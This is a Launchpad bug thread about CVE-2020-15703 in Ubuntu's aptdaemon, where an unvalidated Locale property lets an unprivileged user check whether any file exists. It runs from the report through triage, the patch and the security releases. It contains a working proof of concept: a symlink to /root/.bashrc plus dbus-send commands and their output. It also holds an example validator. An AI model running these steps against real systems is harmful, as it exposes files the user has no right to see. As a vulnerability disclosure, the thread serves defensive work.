Improper Input Validation vulnerability in Locale property of a transaction leading to Information Disclosure

Bug #1888235 reported by Vaisha Bernard on 2020-07-20
Affects: aptdaemon (Ubuntu) | Importance: Undecided | Assigned to: Unassigned

Bug Description

Hi,

There is no input validation on the Locale property in an apt transaction. An unprivileged user can supply a full path to a writable directory, which lets aptd read a file as root. Having a symlink in place results in an error message if the file exists, and no error otherwise. This way an unprivileged user can check for the existence of any files on the system as root.

This is a similar type of bug as CVE-2015-1323.

See the attached Python script for details.

$ ./test_file_exists.py /root/.bashrc
File Exists!
$ ./test_file_exists.py /root/.bashrca
File does not exist!

Description: Ubuntu 20.04 LTS
Release: 20.04

aptdaemon:
  Installed: 1.1.1+bzr982-0ubuntu32.1
  Candidate: 1.1.1+bzr982-0ubuntu32.1
  Version table:
 *** 1.1.1+bzr982-0ubuntu32.1 500
        500 http://nl.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
        500 http://nl.archive.ubuntu.com/ubuntu focal-updates/main i386 Packages
        100 /var/lib/dpkg/status
     1.1.1+bzr982-0ubuntu32 500
        500 http://nl.archive.ubuntu.com/ubuntu focal/main amd64 Packages
        500 http://nl.archive.ubuntu.com/ubuntu focal/main i386 Packages

Kind regards,
Vaisha Bernard
EYE Control B.V.

Alex Murray (alexmurray) wrote :

Yes, I can confirm this is an issue, and it is quite similar to CVE-2015-1323 - as in https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587, a simple bash example via dbus-send is enough to demonstrate this:

$ mkdir -p /tmp/a/LC_MESSAGES
$ ln -s /root/.bashrc /tmp/a/LC_MESSAGES/aptdaemon.mo
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile \
    string:/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb \
    boolean:false
method return time=1595299798.945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2
   string "/org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156"
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156 \
    org.freedesktop.DBus.Properties.Set \
    string:org.debian.apt.transaction string:Locale string:/tmp/a.
Error org.freedesktop.DBus.Python.OSError: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/policykit1.py", line 152, in get_uid_from_dbus_name
    return_value(uid)
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 462, in return_value
    raise _DefGen_Return(val)
defer._DefGen_Return: 1000

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property
    self._set_locale(value)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 835, in _set_locale
    self._translation = gettext.translation("aptdaemon",
  File "/usr/lib/python3.8/gettext.py", line 613, in translation
    t = _translations.setdefault(key, class_(fp))
  File "/usr/lib/python3.8/gettext.py", line 261, in __init__
    self._parse(fp)
  File "/usr/lib/python3.8/gettext.py", line 393, in _parse
    raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/LC_MESSAGES/aptdaemon.mo'

Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?

Seth Arnold (seth-arnold) wrote :

Nice find.

Please use CVE-2020-15703 for this issue.

Thanks

Vaisha Bernard (vaisha) wrote :

> Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?

Only here: https://bugs.launchpad.net/aptdaemon/+bug/1888232
Was unsure which of the two aptdaemon bugtrackers was the correct place to report this.

Alex Murray (alexmurray) wrote :

OK, I don't have access to that bug report, so I can't see the activity there - I am assuming that perhaps there has been no response, hence this bug report - would you be able to subscribe me to it?

Alex Murray (alexmurray) wrote :

FYI - I have duped https://bugs.launchpad.net/aptdaemon/+bug/1888232 against this bug to avoid any confusion (i.e. this is the one true bug report for this issue).

Alex Murray (alexmurray) wrote :

Subscribing Julian for visibility.

Changed in aptdaemon (Ubuntu):
status: New → Triaged
Julian Andres Klode (juliank) wrote :

This should be easy to fix; a check for "/" in the locale name should suffice. Wondering whether Python should be fixed as well / instead though, such that locale._parselocale() does not consider "/tmp/a." a valid locale with language /tmp/a and region None.

Changed in aptdaemon (Ubuntu):
status: Triaged → In Progress
Julian Andres Klode (juliank) wrote :

Attached patch. Might need more changes, but this seems the right place. It makes it fail if the locale is a path with / in it. Not sure if we need to check other things.

I guess this applies to all releases.
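
The parsing flaw Julian describes above and the "reject locales with full paths" check the fix introduces, as an added example that is not aptdaemon's code: the candidate path is composed the way gettext.find() composes it (os.path.join of localedir, language, LC_MESSAGES and the domain .mo), while LOCALEDIR, the allow-list regex and the function names are this example's own assumptions.

```python
"""Added example, not aptdaemon's code: how an unvalidated Locale value
reaches the .mo lookup, and a check that rejects it before it gets there."""
import locale
import os
import re

DOMAIN = "aptdaemon"
LOCALEDIR = "/usr/share/locale"  # assumed default; the real localedir is build-specific

# Allow-list for lang[_REGION][.CODESET][@modifier] plus "C"/"POSIX".
# Stricter than the "/" check in the thread; this shape is the example's choice.
LOCALE_RE = re.compile(
    r"^(C|POSIX|[A-Za-z]{2,8}(_[A-Za-z0-9]{2,8})?(\.[A-Za-z0-9-]+)?(@[A-Za-z0-9]+)?)$")

def catalog_candidate(locale_str, localedir=LOCALEDIR, domain=DOMAIN):
    """Return the path gettext would probe for locale_str, without touching disk.

    locale._parse_localename is the private helper the thread calls
    _parselocale(): it splits language from codeset on the first "." and
    returns "/tmp/a" as the language of "/tmp/a.".  (A bare "/tmp/a" raises
    ValueError, which is why the PoC value carries the trailing dot.)
    """
    lang, _codeset = locale._parse_localename(locale_str)
    if not lang:
        return None  # "C" / "UTF-8": no catalog is looked up at all
    # Mirrors gettext.find(): os.path.join discards every earlier component
    # when it meets an absolute path, so a leading "/" in lang replaces
    # localedir entirely and aptd would open an attacker-chosen file as root.
    return os.path.join(localedir, lang, "LC_MESSAGES", domain + ".mo")

def is_safe_locale(locale_str):
    """The released fix rejects locales containing "/"; the allow-list on top
    also stops ".." and other shapes a locale name never has."""
    if "/" in locale_str or "\0" in locale_str:
        return False
    return LOCALE_RE.match(locale_str) is not None

def set_locale_checked(locale_str):
    """Hardened analogue of the property setter: validate first, resolve second."""
    if not is_safe_locale(locale_str):
        raise ValueError("invalid locale: %r" % locale_str)
    return catalog_candidate(locale_str)

if __name__ == "__main__":
    for value in ("de_DE.UTF-8", "/tmp/a.", ".."):
        state = "accepted" if is_safe_locale(value) else "REJECTED"
        print("%-12s -> %s (%s)" % (value, catalog_candidate(value), state))
```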

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package aptdaemon - 1.1.1+bzr982-0ubuntu32.2

---------------
aptdaemon (1.1.1+bzr982-0ubuntu32.2) focal-security; urgency=medium

  * SECURITY UPDATE: information disclosure via locale (LP: #1888235)
    - debian/patches/CVE-2020-15703.patch: reject locales with full paths
      in aptdaemon/core.py.
    - CVE-2020-15703

 -- Marc Deslauriers <email address hidden> Wed, 23 Sep 2020 07:20:14 -0400

Changed in aptdaemon (Ubuntu):
status: In Progress → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package aptdaemon - 1.1.1+bzr982-0ubuntu19.4

---------------
aptdaemon (1.1.1+bzr982-0ubuntu19.4) bionic-security; urgency=medium

  * SECURITY UPDATE: information disclosure via locale (LP: #1888235)
    - debian/patches/CVE-2020-15703.patch: reject locales with full paths
      in aptdaemon/core.py.
    - CVE-2020-15703

 -- Marc Deslauriers <email address hidden> Wed, 23 Sep 2020 07:27:57 -0400

Changed in aptdaemon (Ubuntu):
status: In Progress → Fix Released
information type: Private Security → Public Security
Marc Deslauriers (mdeslaur) wrote :

The updates for this issue have been released:

https://ubuntu.com/security/notices/USN-4537-1

Thanks!

Ravikant (ravikantcool) wrote :

Ethereum

Changed in aptdaemon (Ubuntu):
assignee: nobody → Ravikant (ravikantcool)
Changed in aptdaemon (Ubuntu):
assignee: Ravikant (ravikantcool) → nobody